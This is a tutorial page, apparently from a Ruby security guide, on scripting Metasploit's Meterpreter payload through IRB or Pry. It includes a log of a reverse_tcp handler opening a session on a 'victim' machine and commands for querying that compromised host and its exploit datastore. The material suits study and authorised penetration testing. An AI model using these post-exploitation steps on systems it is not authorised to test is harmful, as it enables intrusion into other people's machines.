Meterpreter

From the official wiki, The Meterpreter is an advanced payload that has been part of Metasploit since 2004. Originally written by Matt “skape” Miller, dozens of contributors have provided additional code, and the payload continues to be frequently updated as part of Metasploit development.

Meterpreter is a payload framework that provides APIs to interact with by writing scripts and plugins that increase its capabilities. You can find Meterpreter scripts in metasploit-framework/scripts/meterpreter those scripts that you use in post exploitation using run (e.g. getuid, getsystem, migrate, scraper, etc). Meterpreter source code is located in metasploit-framework/lib/rex/post/meterpreter.

Actually, you can’t imagine the power of Meterpreter until you read its wishlist and features not just use it.

To get started, let’s to get a Meterpreter shell on a victim machine to start practicing it inline then we can write some scripts

Once you get the Meterpreter shell type irb to be dropped into ruby’s IRB. Most of required modules will be loaded already. Then type require 'irb/completion' to support auto-completion for the IRB console, just like the follows

  1. msf exploit(handler) > exploit
  2. [*] Started reverse handler on 192.168.0.18:4444
  3. [*] Starting the payload handler...
  4. [*] Sending stage (957486 bytes) to 192.168.0.18
  5. [*] Meterpreter session 1 opened (192.168.0.18:4444 -> 192.168.0.18:33603) at 2015-11-22 06:33:00 +0300
  6. meterpreter > irb
  7. [*] Starting IRB shell
  8. [*] The 'client' variable holds the Meterpreter client
  9. >> require 'irb/completion'
  10. => true

If you would like to use Pry instead of irb then type pry and make the console more readable. Personally, I’d prefer pry

  1. meterpreter > pry
  2. _pry_.prompt = proc { "-> " }

As you can see, you’ve been dropped to the IRB console with an instance variable called client of the running Meterpreter.

Try this as a start

  1. print_good("Rubyfu!")
  • To list all associated methods with client instance

This will return an array.

  1. puts client.methods.sort

Let’s to check some of the interesting methods there.

  • Victim’s IP address and port
  1. client.session_host
  2. client.session_port
  • Victim’s computer information and plat form
  1. client.info
  2. client.platform

Returns

  1. => "win7-64-victim\\Workshop @ WIN7-64-VICTIM"
  2. => "x86/win32"
  • Get the current exploit datastore
  1. client.exploit_datastore
  2. # Or
  3. client.exploit.datastore

Returns a hash contains all the exploit information that result to this Meterpreter session

  1. {"VERBOSE"=>false, "WfsDelay"=>0, "EnableContextEncoding"=>false, "DisablePayloadHandler"=>false, "ExitOnSession"=>true, "ListenerTimeout"=>0, "payload"=>"windows/meterpreter/reverse_tcp", "LPORT"=>4444, "ReverseConnectRetries"=>5, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependMigrate"=>false, "EXITFUNC"=>"process", "AutoLoadStdapi"=>true, "AutoVerifySession"=>true, "AutoVerifySessionTimeout"=>30, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "lhost"=>"192.168.0.18", "ReverseListenerBindPort"=>0, "TARGET"=>0}